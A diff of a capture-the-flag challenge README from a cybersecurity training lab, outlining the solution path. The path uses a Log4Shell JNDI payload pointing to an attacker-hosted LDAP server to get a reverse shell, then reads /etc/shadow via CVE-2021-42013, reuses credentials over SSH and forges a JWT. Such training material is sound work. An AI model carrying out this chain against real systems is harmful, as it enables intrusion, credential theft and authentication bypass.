stratosphereips/stratocyberlab/campaigns/miro/forgot-your-password/README.md

 ## How to solve

-Follow the instructions in the attached autosolver application.
+Follow the instructions in the [attached auto-solver application](./auto-solve/ldap-server/src/main/java).

 TLDR:

+1. Get a reverse shell to the challenge's internal network:
-1. Run a reverse shell listener in the hackerlab
+    1. In the hackerlab, start a reverse shell listener (e.g. on port 1338)
-2. Run [an HTTP server](./auto-solve/ldap-server/src/main/java/PayloadHTTPServer.java) (also in the hackerlab) to host a [class that will launch a reverse shell](./auto-solve/Exploit.java) connection to the listener from the previous step
+    2. Also in the hackerlab, start [an HTTP server](./auto-solve/ldap-server/src/main/java/PayloadHTTPServer.java) (e.g. on port 8083) to host a [class that will launch a reverse shell](./auto-solve/Exploit.java) connection to the listener from the previous step (i.e., `hackerlab:1338`)
-3. Run [an LDAP server](./auto-solve/ldap-server/src/main/java/LDAPRefServer.java) (still in the hackerlab) to point to the hosted class from the previous step
+    3. Still in the hackerlab, start [an LDAP server](./auto-solve/ldap-server/src/main/java/LDAPRefServer.java) to point to the hosted class from the previous step (i.e., `http://hackerlab:8083/#Exploit`)
-4. [Post a payload](./auto-solve/ldap-server/src/main/java/Launcher.java) to the Java app running at `/auth/*` to exploit CVE-2021-44228 and point to the LDAP server from the previous step
+    4. [Post a payload](./auto-solve/ldap-server/src/main/java/Launcher.java) to the Java app running at `/auth/*` to exploit [CVE-2021-44228 (also known as Log4Shell)](https://en.wikipedia.org/wiki/Log4Shell) and point to the LDAP server from the previous step (i.e., `jndi:ldap://hackerlab:389/...`)
+   5. The payload should enable the reverse shell - from the hackerlab, you should now be able to run commands on another machine (`authus` inside the `172.21.0.0/24` network)
-5. Through the reverse shell, explore the machine and the network
+2. Your reverse shell should now be functional.
+Use it to explore the connected machine and its network
-6. From the sources of the application the reverse shell is running through (JAR located in `/app/`), extract a HMAC256 JWT signing secret
+3. From the sources of the application the reverse shell is running through (JAR located in `/app/`), extract a HMAC256 JWT signing secret
-7. Find a `mailus` suffering from CVE-2021-42013, allowing an attacker to read `/etc/shadow`
+4. Find a `mailus` suffering from CVE-2021-42013, allowing an attacker to read `/etc/shadow`
-8. Reuse the same credentials to SSH into `logus` and extract a user ID from `/var/log/dashboard/proxy2021-12-09.log`
+5. Reuse the same credentials to SSH into `logus` and extract a user ID from `/var/log/dashboard/proxy2021-12-09.log`
-9. Forge a JWT with containing simply the user ID, and sign it with the signing secret
+6. Forge a JWT with containing simply the user ID, and sign it with the signing secret
-10. Access the dashboard (repository) and copy and submit the flag
+7. Access the dashboard (repository) and copy and submit the flag